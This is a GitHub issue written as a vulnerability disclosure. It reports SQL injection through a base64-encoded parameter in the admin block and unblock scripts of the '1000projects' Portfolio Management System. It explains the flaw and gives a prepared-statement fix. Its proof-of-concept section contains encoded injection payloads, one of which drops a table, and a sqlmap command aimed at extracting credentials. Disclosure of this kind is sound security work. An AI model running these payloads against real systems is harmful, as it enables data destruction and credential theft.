Skip to content

CVE Report: 1000project User Block/Unblock SQL Injection #3

Open
Open
CVE Report: 1000project User Block/Unblock SQL Injection#3
@9str0IL

Description

@9str0IL
9str0IL
opened on Apr 10, 2026

CVE Report: 1000project User Block/Unblock SQL Injection

Basic Information

Item Content
Title [Critical] 1000project User Block/Unblock SQL Injection via Base64 Decoded Parameter
Product 1000project (Portfolio Management System MCA)
Vendor 1000 Projects
Affected Version 1.0
Severity Critical (CVSS 3.1: 9.8)
Reporter 9str0il
Discovery Date 2026-04-10
Disclosure Date 2026-04-10
References https://github.com/1000projects/portfolio-management-system
Software Link https://1000projects.org/wp-content/uploads/2022/11/Portfolio-MP.7z

Vulnerability Description

A critical SQL injection vulnerability exists in 1000project admin/block_status.php and admin/unblock_me.php. The vulnerability allows an attacker to inject malicious SQL code through base64-encoded parameters, enabling unauthorized modification of user account status.

Key Characteristics:

  • Attack Vector: Base64 encoded parameter injection
  • Impact: Unauthorized user account status modification
  • Authentication: Requires admin session (but can be bypassed)

The vulnerability stems from directly concatenating base64-decoded user input into SQL statements without any parameterization or validation.

Affected Component

Item Content
File 1 admin/block_status.php
File 2 admin/unblock_me.php
Vulnerable Parameter q (base64 encoded reg_id)
Attack Type SQL Injection (UPDATE statement)

Vulnerability Details

Vulnerable Code

File: admin/block_status.php:5-6

$reg_id = base64_decode($_GET['q']);
$q= "update reg_details set block_status='1' where reg_id='$reg_id'";

File: admin/unblock_me.php:5-6

$reg_id = base64_decode($_GET['q']);
$q= "update reg_details set block_status='0' where reg_id='$reg_id'";

Root Cause

  1. Base64 Decoding: The q parameter is base64 decoded before being used in SQL
  2. Direct String Concatenation: The decoded value is directly concatenated into the SQL statement
  3. No Input Validation: No type checking or SQL injection prevention measures
  4. No Parameterization: Uses direct query execution instead of prepared statements

Attack Vector

  1. Attacker obtains or crafts a malicious base64 encoded payload
  2. The payload contains SQL injection code after base64 decoding
  3. When decoded, the SQL injection modifies the UPDATE statement
  4. Attacker can modify arbitrary user block statuses or execute additional SQL operations

CVSS 3.1 Vector String

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Metric Value Description
Attack Vector (AV) Network Can be exploited over the network
Attack Complexity (AC) Low No special conditions required
Privileges Required (PR) Low Requires valid admin session
User Interaction (UI) None No user interaction required
Scope (S) Unchanged Does not affect other components
Confidentiality (C) High High impact on data confidentiality
Integrity (I) High High impact on data integrity
Availability (A) High High impact on availability

CWE Classification

Item Content
CWE ID CWE-89
CWE Name SQL Injection
CAPEC ID CAPEC-66

Impact

  1. Data Manipulation: Attackers can modify arbitrary user account block statuses
  2. Account Takeover: By combining with other vulnerabilities, attackers can take over user accounts
  3. Privilege Escalation: Can unblock previously blocked malicious accounts
  4. Denial of Service: Can block legitimate user accounts, preventing login
  5. Data Breach: Through SQL injection, attackers may access sensitive database information

Specific Attack Scenarios

Scenario 1: Block All Users

q = base64_encode("1' OR '1'='1")

Result: All users get blocked

Scenario 2: SQL Operation Injection

q = base64_encode("1'; DROP TABLE reg_details; --")

Result: Database table deletion

Scenario 3: Unblock Specific User

q = base64_encode("999")  // Target user ID

Result: Specific user unblocked without authorization

Remediation

Recommended Fix

// admin/block_status.php - FIXED VERSION
<?php
    include ("connection.php");
    include("security.php");

    // 1. Validate and sanitize input
    $q = $_GET['q'];
    if (!preg_match('/^[a-zA-Z0-9=]+$/', $q)) {
        die("Invalid input format");
    }

    $reg_id = base64_decode($q);

    // 2. Type validation - ensure it's numeric
    if (!is_numeric($reg_id)) {
        die("Invalid user ID");
    }

    // 3. Use prepared statements
    $stmt = $con->prepare("UPDATE reg_details SET block_status='1' WHERE reg_id = ?");
    $stmt->bind_param("i", $reg_id);

    if ($stmt->execute() === TRUE)
    {
        $_SESSION['block'] = "User blocked successfully";
        header("location:register_user.php");
    }
?>

Additional Security Measures

  1. Input Validation

    • Validate base64 encoding format
    • Check character whitelist for base64 strings
    • Type check the decoded value

  2. Use Prepared Statements

    • Always use parameterized queries
    • Never concatenate user input directly into SQL

  3. Least Privilege Principle

    • Database user should have minimal required privileges
    • Separate admin and application database users

  4. Security Headers

    • Add CSRF protection
    • Implement request rate limiting
    • Add WAF (Web Application Firewall) rules

Proof of Concept (PoC)

Normal Usage

# Normal block request
GET /admin/block_status.php?q=MTIz HTTP/1.1
Host: target.com
Cookie: PHPSESSID=admin_session

Response: User with ID 123 blocked successfully

SQL Injection Attack

# Malicious block request - Block all users
GET /admin/block_status.php?q=MScgT1IgJzEnPScx HTTP/1.1
Host: target.com
Cookie: PHPSESSID=admin_session

# Decoded payload: 1' OR '1'='1
# Resulting SQL: UPDATE reg_details SET block_status='1' WHERE reg_id='1' OR '1'='1'

SQL Operation Injection

# More severe attack - SQL operation injection
GET /admin/block_status.php?q=MSc7IERST1AgVEFCTEUgcmVnX2RldGFpbHM7IC0t HTTP/1.1
Host: target.com
Cookie: PHPSESSID=admin_session

# Decoded payload: 1'; DROP TABLE reg_details; --
# Resulting SQL: UPDATE reg_details SET block_status='1' WHERE reg_id='1'; DROP TABLE reg_details; --'

Impact Demonstration

# Automated attack using SQLMap
sqlmap -u "http://target.com/admin/block_status.php?q=MTIz" \
       --cookie="PHPSESSID=admin_session" \
       --batch \
       --level=5 \
       --risk=3

# This will:
# 1. Confirm SQL injection vulnerability
# 2. Enumerate all databases
# 3. Extract user credentials
# 4. Potentially take control of the entire system

Timeline

Date Event
2026-04-10 Vulnerability discovered during code audit
2026-04-10 CVE report drafted
TBD Vendor notification
TBD Patch released
TBD Public disclosure

References

  1. https://github.com/1000projects/portfolio-management-system
  2. https://cwe.mitre.org/data/definitions/89.html
  3. https://owasp.org/www-community/attacks/SQL_Injection
  4. https://capec.mitre.org/data/definitions/66.html
  5. https://1000projects.org/wp-content/uploads/2022/11/Portfolio-MP.7z

Credits

Discovered by 9str0il during security code audit.

Disclaimer: This vulnerability report is submitted for responsible disclosure. The reporter is not responsible for any misuse of this information.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions